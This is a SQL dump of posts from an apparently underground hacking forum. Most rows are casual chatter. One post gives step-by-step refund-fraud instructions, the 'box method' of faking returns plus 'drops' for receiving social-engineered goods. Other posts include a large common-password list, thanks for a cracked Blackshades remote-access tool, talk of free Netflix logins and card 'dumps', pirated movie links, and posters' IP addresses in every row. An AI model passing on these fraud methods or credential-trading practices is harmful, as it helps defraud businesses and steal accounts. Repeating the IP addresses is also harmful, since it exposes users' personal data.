`tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6391', '861', '6378', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1351207372', '[quote=\'iTzIpod\' pid=\'6378\' dateline=\'1351197691\'] Pssh. It\'s kinda LQ (Some of the threads and posts) Like for example the thread names from Trey... I don\'t like the fact that his grammar and spelling is bad. I told him countless times to fix it and he\'s like \"okay.\" Without starting with a capital O for \"Okay\" or whatsoever. -.- [/quote] I have fixed my grammar you just haven\'t noticed :S', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '10ab355ec8de0557fb701fc8836acb8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6392', '1096', '6357', '7', 'RE: Leaked e-book Pack [Lot\'s of stuff]', '0', '82', 'iTzIpod', '1351212377', 'Download it. Use your AntiVirus program to scan it for any viruses or so. And done. Post results. Or, download it. Go on virustotal.com And then upload the file. And scan it. Post link And done.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5e107b64280954a871cbf1c3e3e932dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6393', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351212430', 'What are you talking about? I see my avatar all the time I post. It\'s never broken. [img]http://i.imgur.com/kQFf9.png?dateline=1345558891[/img] http://i.imgur.com/kQFf9.png?dateline=1345558891 There ^ Still, rate is 1/10 for your avatar', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b8b830b625985fb1e2a0e547cfcff258', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6394', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351212519', 'Really? I checked my PMs numerous times and checked some of your posts. Most of them don\'t start with a capital nor have any apostrophes or whatnot.. Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adecc56558992c0937b500283e96052f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6395', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '82', 'iTzIpod', '1351212578', 'I gotta give him props for doing that heroic action. That body slam was like that uppercut. Lol (Ohio Bus Driver Uppercut thingy)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd310f53e1c15dc73a6cf1b6658478f38', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6396', '1093', '6341', '7', 'RE: I\'m back', '0', '1', 't3h jok3r', '1351214906', 'Unfortunately every time you logged in you were on a VPN so I can\'t unban you unless you log on with your real IP or send me your IP through PM.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '292e8e297f6795321065df31f11fabd5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6397', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '7', 'Romdu62', '1351215477', 'Brave guy. This proves that there\'s still humanity left.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '48ced9e578e20e0d02e64e0faa7b23fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6398', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '7', 'Romdu62', '1351215549', 'I like the suggestion will keep things organized.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8c9fe3c10af4ec1db0107c540361b2ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6399', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '7', 'Romdu62', '1351215596', 'K & i\'m checking profiles daily. You can change the products for money.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '11f7e8bea79cc5fd710ef799cf463cad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6400', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '7', 'Romdu62', '1351216084', 'I disagree with the pringles one. When I was new and I used the same exact reason (I just didn\'t say that I was a gamer). They said they are sorry for the inconvenience and they will try to make sure all their future products are in good condition.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2952bfdb96ce351a7e80b7cfc2063064', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6401', '1099', '0', '16', 'Box Method and Drop Explained', '0', '7', 'Romdu62', '1351216534', '[u][b]Box Method[/b][/u] : When you are asked to send it in the product back to the company but since you don\'t have it you use the box method. You print out the conversation and put it in a box, beat the shit out of it but don\'t make it look too bad. Then put tape around it then put it into another box. Put something like salt and make a small hole so it has some weight and by the time it reaches the company it becomes empty. Call back the company after a week asking what happened to your replacement. They will say that it was empty say that you sent the product. [u][b]Drop[/b][/u] Drop is a fake location that you use to get your SE\'d items. For example you SE\'d a laptop and you don\'t want the delivery to happen at your house so you use fake location most likely a empety house around or something. Stay by the door or act like you are leaving when postmail covers.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '80fab85ed9c31b2be24cf5e03b646e7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6402', '1100', '0', '42', '895 passwords not to use.', '0', '7', 'Romdu62', '1351217077', 'Here\'s a list of the most common passwords so i recommend not to use them. [code] minecraft password 12345 passport diablo alpha 12345678 1 zxcvbnm trustno1 shit monkey hello elite abc123 windows thunder thomas therock sony robert random qwerty qazwsx presario piff pierre peace pana ninja music mike michael menace master maria letmein lemmein jericho jamesbond hacker fuckyou frogfrog fish eminem dragons dantheman buster brooklyn bodhisattva blue blowme beebop bean21 baseball 666666 485112 187187 1234 1134 11111111 zzzzzz zilch zerocool zapatista zahra z3r0 yumes yoyo yo yellow xyz xxxxxxxx xwings xuser xtc wutang wunder wouter1 worthless wonder winnie winhex windwalker willie william wildman wildcard wild whore whizzkids whatever1 whatever wetwilly weed webcam1 waterloo warzone warez wantto wankers wallace vt voodoo vette1 valentine usagi unregistered union underdog uffaaa typhoon tyler2 ty98 twf tusse turky turbo tuesday truk troubles trottel trinitron tricia44 tricia tribute tribe toshiba toad tippy tikki tigger tif three therock1 thend themaster thedog thatisit thailand testtest termite terblo temp telephone teacher1 tartarus talon6 talamar taju taboo1 sword surfing surfer22 superman sunflower suckit sublime stumptown stuffies stinky steven stefan squaresoft square spyderco spug spongebob spikerip sourcecode sofie smokey smith smigul slovenia slipknot slampa skar23 sithlord single1 sindy28 sinder simple silverwing siberia shortcut shithead shibboleth shiatsu shearer9 shareef shaolin shaft shadow seymour seven semperfi sekhmet seifer security sebastian se7en scooter scooby schumacher schiess sbbut satire satan sane sandman sanderson samuel same sambuca sadbuttrue sabina s3cr3t s1mpl3 roze rootbeer romece rockstar roberto robbie revilo rentrap rellik reliable relena reimann register redwater reddragon redbull redalert reaver raza raytel rayann rawnewdlz rawiswar ravens rascal rapture raptor17 rapalA rannug rani randhir rambo rainman rainbow rain radioactive radio7 radar rachel qwertyuiop qwertyui qwerty23 qwaszx qqw qazwsxedc q1w2e3 pussy prowler provost predator pppp powers powell poser poop pomme poiuytrewq poiuytre plop please playstation plat pitbull pitagoras pimpin pillow pilgrim phunky phreek phoenix philly phate pharma pgpgpg peterla peterb perfect pepon pennys peewee peebee peaches peach passwd parham paranoid paradise pantera6 padraig ozzy owell override oralia oquendo openit oliver oldenberg number1 noway nothing nono none nobody nn3 ninnin nilsson nikolas nikita nihongo nightnight nexus6 newnew newdog newbee nevernever nermy neontrain nenga nedkelly nbb nayaran naxos navyseal nautilus nadia n2deep n0ne mystery mushki mowers moviestar movies motocross moshi moscow moose moon money mommy mommom moltar moloch mmoshi mitabrev miriam mind midgar michelle metoo member melody melo1977 meathead maxell mattp matrix mathers mary marley marisol manutd mangie mamma makeitso magic1 maggie1 lulop lowlow love louise lopez looga long logjam locks liquor lionking4 lionheart linux limpbizkit lilian1 lightsabre lightning lexmark lenong lemon lautrec lasher lansing lanparty lancaster ladybug kyle11 kut kuffs krap kookies kompas kodecypher koalabear kmp80 kitty kitten kirin kingking kima killer1 killer kewin kenner kcampbell katrina kate kameler kamari kaizers julie jujai jstevens joris jonah jon jollyrogers jojojo john joe jimboy jhi jester jessica jeremy jennifer jenn jbull jaybee jaws javert jasper jasonl izzy ivanaj itisme ireland instinct insane innovision inlove inimulli imzadi iloveyou ih iforgot idontknow idiot iamgod hunter huh hugo hubert hop honor honda homes homerjay holly hockey hmb hitman hilda hightimes hi helpme helena heineken hehehe hawley hatred hardcore happy happiness hanging handle halflife hak95 hacking hackhack hackers gyros guy gustavo gunshot gundam guitar grynn greenday green greece grassroots google goldfish goldberg gloria glasaal give girl ginger gibson get316 george genesis gator gateway gangster gandalf gamma gaming fuzzball fuguz fuckyoutoo fuckoff fucker front242 freshmeat freedom1 freedom frederik freddie frasse foxman flywheel flames fireman ffffff felix fear fatboy fart fantasy fallenangel faith fairmont fabrizio eyes exploit evil1 eu86t etherton estelle eroica enterprise enigma elitist elf1 element elegance edwards eat eaglescout dumbass duck drsmith drowssap drevil drdre draziw dragonfly doritos doom doggys ditu disowned dingle dimension diglet dick diablo2 deville ders1 default deejay decent death deadman dbzdbz davy david1 dartagnan darkdog dark danny20 dalgas dabomb cszwed cstrike crystalscan crystal cricket crepitus crashand crappo crapper crap crackers cows cow coushin courtney cosmo corsair corinna cooldude coold cool continuim computer1 computer colleen coffman codetracker cobra clent claudius clark cisco123 cimbom christophe1 chilli chessino chefchef chazz1 chatter1 change champion champ challenger ccsf ccccc cc cathy carter carnival caramba candy canada cambridge camaro caliente cafer cacca by8540 butthead butterfly1 butterfly busto burt burritos bugsfix budale buba broman brittany brian brenda breanna brazil brambles bottle boston bonzie boll bobos bobby blueberries blubb blitz blahblah bitterwoo birchard bimbo1 biggame bible bibbob beta bertje benbob bellix becks bear bathroom banzai bandit bailey badass b16a1 awed aviation avatar auscam auckland athlon asterix ast asskicker asker asinat archdevils anonymous angels anfernee andyb andrea anders anarchy1 amirman amireal1 althea alpha1 alisha alien ali alexande albino airplane affinity adolf adios adam04 acheron aceman acef abide abcda aaaaaa ZZZZZ Trisha Tetris TULLE TROY TRITON THEROCK Scorpions72 Sambrook SAMUEL SAMSUNG Roland Redwings Qwerty Paulan1 Paul19 PROTON PRIMITIVE Millenium Melvin MERT LarsLars Jonathan Hotties Hanibal HUNTER Goop Godsent Fugazi Dragon Digital Cyres Cyber CowboyBebop Centauri Caspar CORNER Berliner Bearfoot Annemarie 99999 987654321 9770 975384 9177 898989 895623 8816 822822 811820 800070 786110 7777 777 741235 74123 71380 64897 6148 61284 55dflw 545937 523470 486570 48469 4462 4402020 437782 350450 3425283 33305 314159 31337 2cool4u 29385098 284812 280472 261127 25802580 25101986 24911 24 2353535 2320111 23 2227 2222 220587 2203 2132 2122 2040 2000 1spyder 1qaz 1q2w3e 1izznit 1QAZ 19840824 1984 1977 1969 183461 180155 1782 170120 164810 159951 1568 1547 1488 14807 147896 1340lu 1313 123ccc 123789 1234566 123123 123 122782 122386 120981 120973 114182 112358 112233 111222 101183 090284 072160 062 05071984 0502 0411 027702 022367 019210 011386 007 0009 0000 00 [/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '670b60c612b82251ff3082c8f81eee2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6403', '1088', '6383', '49', 'RE: Best unique and useful suggestion', '0', '5', 'Timmy', '1351217177', '[quote=\'iTzIpod\' pid=\'6383\' dateline=\'1351197922\'] I don\'t really like the idea. Kinda like the Off Topic Section. [/quote] Yes but this will be for tutorials.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3c91cbafd6905a278be08e361c3295b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6404', '1090', '6329', '8', 'RE: What is this song called?', '0', '5', 'Timmy', '1351217250', 'Not black and yellow. It\'s a new song i think,', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0a7eb9473145c0f89d0a386452476ae7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6405', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '1', 't3h jok3r', '1351217319', '0/10 because no one on this thread got 0 and you are unique ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e2673cfd7ffd10183ab0b17f81b8ea81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6406', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '8', 'spacefish36', '1351217420', 'i learned a lot today thanks timmy', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bc1b251cfe95eb6e4c2f5eb700437ca2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6407', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '8', 'spacefish36', '1351217464', 'OMG thanks for this, i really really needed this', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e69f09dcb7d16e4f5acff24a5118669d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6408', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351217544', '10/10 because its the greatest admin ever :P', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '2ed732a8ec5356cdca296d37b3949c9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6409', '1101', '0', '49', 'Dumps Section', '0', '8', 'spacefish36', '1351217673', 'I think we should have a dumps section', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'eaf3f79ec0048f606bff5420459056d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6410', '1096', '6357', '7', 'RE: Leaked e-book Pack [Lot\'s of stuff]', '0', '257', 'XxTREYZxX', '1351217686', 'Dont worry guys (thread closed)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '5e3f1be66c4c8dfc365ba0ebf3a4bbac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6411', '1091', '6408', '56', 'RE: Rate the avatar above you', '0', '8', 'spacefish36', '1351217739', '[quote=\'XxTREYZxX\' pid=\'6408\' dateline=\'1351217544\'] 10/10 because its the greatest admin ever :P [/quote] can he get the ass kisser award? 6/10 nice guy and active', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fd8853a2b1e883fe8fe81790b9f7fd48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6412', '1102', '0', '69', 'What kinds of programs have you coded before', '0', '8', 'spacefish36', '1351218025', 'Does the title say it all? Yebo', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'edf3c6190335327dac2d6beecab757c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6413', '1103', '0', '3', 'Movie & TV RIPs, Streams etc', '0', '1', 't3h jok3r', '1351218130', 'Movie & TV RIPs, Streams etc section is now public. Everyone can view and post in it without upgrading or requiring a password.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '818341e106d39710ac299cb182715706', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6414', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351218244', '0/10 because you dont have one', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '5d21f85b31a30b72bab71443bda72972', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6415', '1101', '6409', '49', 'RE: Dumps Section', '0', '82', 'iTzIpod', '1351218311', 'Should have it in the Upgraded Section though :) I agree. +1.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d3dcd2b03672759d5e9c91f2ee329a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6416', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351218398', '0/10. That avatar\'s too common. I don\'t like it too. It\'s annoying :p -------', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f94b03b892e805200fe434768fc0ffe9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6417', '1103', '6413', '3', 'RE: Movie & TV RIPs, Streams etc', '0', '82', 'iTzIpod', '1351218438', 'Nice update t3h jok3r! :) I miss JakeUS. Any sign on what happened to him?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5f2dcc383717f172a73e446ef0ce395b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6418', '1104', '0', '64', 'The raise of the apes (2011) movie rip available here', '0', '9', 'p420', '1351218445', 'Description: An origin story set in present day San Francisco, where man\\\'s own experiments with genetic engineering lead to the development of intelligence in apes and the onset of a war for supremacy.. Rating: 9.2/10 (1045 votes) Genre: Action , Thriller , Drama , Sci-Fi Release: 5 August 2011 Length: 105 min Views: 0 (1405 votes) Links http://hqvideo.cc/pc/4d859c83163310cd/ http://fleon.me/vv.php?Id=a8113cd7206f307dbe7060542347af06 http://streamme.cc/pc/1c34ad4f19909c10/ http://skylo.me/rc.php?Id=de7b0407a00e10d48b04c20be8581854', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3ba0434b53f94927117ce11fee436702', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6419', '1101', '6409', '49', 'RE: Dumps Section', '0', '257', 'XxTREYZxX', '1351218480', 'Yeah this is a good idea mate :O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'cc744954e9a35c64954fd046ac337a5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6420', '1103', '6413', '3', 'RE: Movie & TV RIPs, Streams etc', '0', '9', 'p420', '1351218494', 'Thanks i just posted a thread in that sectoin.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3df990279891edf7bb742f9a481fc11f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6421', '1073', '6241', '64', 'RE: Free Premium Netflix logins', '0', '82', 'iTzIpod', '1351218532', 'I don\'t think you can stream with these since it leads you to the YourAccount page.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '105a20ddc2d24148476c9df0f7c1cbd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6422', '1039', '5984', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '9', 'p420', '1351218606', 'Thank you but is this guide helpful?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ea485bc5d81ccf413f6c47579142c880', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6423', '1101', '6409', '49', 'RE: Dumps Section', '0', '9', 'p420', '1351218726', 'Nice idea but maybe free?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '920200c1b6ea61ddb13d56740994216b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6424', '994', '5596', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '9', 'p420', '1351218811', 'Nice layout and is this saturated?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'be368491212fbb503aad9158ca5ad5af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6425', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '205', 'mothered', '1351225104', 'Goodness, I\'d hate to see my result! Anyhow, I like the one above me, so 8.5/10.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ddce7726dc436e9d6d71bf8be6503f4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6426', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '205', 'mothered', '1351225253', 'My work has restricted sites, and running Guest accounts. Unless I delve Into getting permissions, It\'s not really worth It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b1c344a314527d35df774dfdce4ca6d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6427', '1105', '0', '24', 'Windows 8 Officially released 26-10', '0', '205', 'mothered', '1351225585', 'Greetings everyone, Depending on your locality with the time difference, some of you may have Windows 8 officially released based where you are. That\'s the case with myself, but I\'ve had the RTM version activated and running since 2 months ago. I never pay for software, but that\'s just me. So paid or not, will you guys make the switch to Windows 8?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0f9d5ebc479c23ff7bb7d63207dc0b54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6428', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351228729', 'Kinda boring so 5/10 so yeah', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '4b94f6abddb5528a4a7ee16c5b247b64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6429', '1101', '6409', '49', 'RE: Dumps Section', '0', '222', 'Exposé', '1351235882', 'Yeh we have a dumps section in the premium section...it\'s called Premium Accounts...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '92cc9c9d4e08c4959a92086bd9574a18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6430', '1106', '0', '49', 